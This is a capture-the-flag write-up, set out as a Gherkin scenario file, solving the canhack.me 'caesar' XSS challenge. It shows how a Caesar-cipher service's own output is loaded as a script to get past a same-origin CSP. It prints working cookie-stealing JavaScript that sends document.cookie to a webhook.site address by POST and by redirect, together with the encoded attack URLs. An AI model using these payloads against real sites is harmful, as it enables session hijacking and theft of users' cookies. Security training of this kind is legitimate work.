## Version 2.0
## language: en

Feature: caesar-canhackme
  Site:
    canhack.me
  User:
    ununicornio
  Goal:
    Get the tester system's cookie

  Background:
  Hacker's software:
    | <Software name>       | <Version>       |
    | Kali Linux            | 2017.3          |
    | Firefox Quantum       | 64.0b14         |
    | Burp Suite CE         | 1.7.36          |

  Scenario: Fail:xss-in-url
    Given I go to the challenge page
    And it prompts
    """
    This service provides Caesar cipher.
    https://caesar.canhack.me/

    If you find a vulnerability, capture the flag via the URL below.
    https://caesar.canhack.me/tester
    """
    And I go to the caesar cipher service in firefox
    And find this url
    """
    https://caesar.canhack.me/?text=ebiil&key=3
    """
    And this plain output rendered
    """
    hello
    """
    Then I deduce it returns the text variable shifted by the key variable
    Then i go to the tester URL
    And find some useful information about how the challenge has to be solved
    """
    If you enter the URL of this challenge,
    I will set the flag in the cookie and visit the URL you entered
    via Google Chrome 68.0.3440.75.
    """
    Then I think a reflected XSS attack will work for this
    Then I shift an XSS injection string by 3 positions
    """
    <script>alert(1)</script>

    getting

    <vfulsw>dohuw(1)</vfulsw>
    """
    And set the cipher key to -3, building a url that should show an alert
    """
    https://caesar.canhack.me/?text=<vfulsw>dohuw("avv")</vfulsw>&key=-3
    """
    But nothing happens, a blank page is rendered
    Then I view the response page source code to check if any chars are escaped
    And find there are no escaped characters
    """
    <script>alert("xss")</script>
    """
    Then I open the dev console to check for errors, finding
    """
    Content Security Policy: Las opciones para esta página han bloqueado la
    carga de un recurso en inline (default-src).
    """
    Then I intercept a request to the same URL with Burp Suite
    And forward it to get the response
    """
    ...
    Content-Security-Policy: default-src 'self';
    ...
    <script>alert(1)</script>
    """
    And find the CSP is set to only allow content from the same domain
    Then I conclude I won't be able to inject the script directly through URL

  Scenario: Fail:caesars-matryoshka
    Given I know the target only lets content from the same domain be loaded
    Given I can get arbitrary text returned from the target service
    Then I figure I can make it output a malicious script
    Then inject it as external script in another instance of the service
    Then I prepare a call that returns a cookie stealing script
    """
    const Http = new XMLHttpRequest();
    Http.open('POST',
    'https://webhook.site/235c0013-a97f-4266-9149-6bbe909db17b');
    Http.send(document.cookie);
    alert(1);

    Shifted by 3, URL encoded and passed as param with key -3

    https://caesar.canhack.me/?text=const%20Http%20%3D%20new%20XMLHttpRequest%28
    %29%3B%0A%20%20%20%20Http%2Eopen%28%27POST%27%2C%0A%20%20%20%20%27https%3A%2
    F%2Fwebhook%2Esite%2F235c0013%2Da97f%2D4266%2D9149%2D6bbe909db17b%27%29%3B%0
    A%20%20%20%20Http%2Esend%28document%2Ecookie%29&key=-3
    """
    And successfully check it outputs the malicious script
    Then I build a script tag with that as source, and shift(3)+URLencode it
    Then i pass it as cipher to the caesar service with key -3
    """
    <script src="
    https://caesar.canhack.me/?text=const%20Http%20%3D%20new%20XMLHttpRequest%28
    %29%3B%0A%20%20%20%20Http%2Eopen%28%27POST%27%2C%0A%20%20%20%20%27https%3A%2
    F%2Fwebhook%2Esite%2F235c0013%2Da97f%2D4266%2D9149%2D6bbe909db17b%27%29%3B%0
    A%20%20%20%20Http%2Esend%28document%2Ecookie%29&key=-3
    "></script>

    shifted, encoded and ready to steal that cookie

    https://caesar.canhack.me/?text=%3Cvfulsw%20vuf%3D%22%0A%20%20%20%20kwwsv%3A
    %2F%2Ffdhvdu%2Efdqkdfn%2Eph%2F%3Fwhaw%3Dfrqvw%2520Kwws%2520%253G%2520qhz%252
    0APOKwwsUhtxhvw%2528%0A%20%20%20%20%2529%253E%250D%2520%2520%2520%2520Kwws%2
    52Hrshq%2528%2527SRVW%2527%252F%250D%2520%2520%2520%2520%2527kwwsv%253D%252%
    0A%20%20%20%20I%252Izhekrrn%252Hvlwh%252I235f0013%252Gd97i%252G4266%252G9149
    %252G6eeh909ge17e%2527%2529%253E%250%0A%20%20%20%20D%2520%2520%2520%2520Kwws
    %252Hvhqg%2528grfxphqw%252Hfrrnlh%2529%26nhb%3D%2D3%0A%20%20%20%20%22%3E%3C%
    2Fvfulsw%3E&key=-3
    """
    Then I test it
    And the code runs, I get the alert
    But yet again the cookie is not sent
    Then I check the console and there's another CSP error
    """
    Content Security Policy: Las opciones para esta página han bloqueado la
    carga de un recurso en
    https://webhook.site/235c0013-a97f-4266-9149-6bbe909db17b (default-src).
    """
    Then I know I can't make  a requests to external servers either

  Scenario: Success:caesars-matryoshka-2.0
    Given I can execute arbitrary js code in the client
    Given I can't make requests directly through said code
    Then I will need to find another way to exfiltrate the cookies
    Then I figure I can just redirect the client and pass the cookie in the URL
    Then I write a payload to do this
    """
    window.location=
    'https://webhook.site/235c0013-a97f-4266-9149-6bbe909db17b?cookie='+
    document.cookie
    """
    And repeat the shifting+encoding process, building the URL
    """
    https://caesar.canhack.me/?text=%3Cvfulsw%20vuf="kwwsv%3A%2F%2Ffdhvdu%2Efdqk
    dfn%2Eph%2F%3Fwhaw%3Dcotjuc%252Hruigzout%253G%2527nzzvy%253D%252I%252Ickhnuu
    q%252Hyozk%252I235i0013%252Gg97l%252G4266%252G9149%252G6hhk909jh17h%253Iiuuq
    ok%253G%2527%252Ejuiasktz%252Hiuuqok%250D%26nhb%3D%2D3%0A"%3E%3C/vfulsw%3E
    &key=-3
    """
    Then I test it in my browser
    And I get redirected, sending my cookie to the webhook tester
    Then I submit the same URL to the challenge tester
    And get the flag
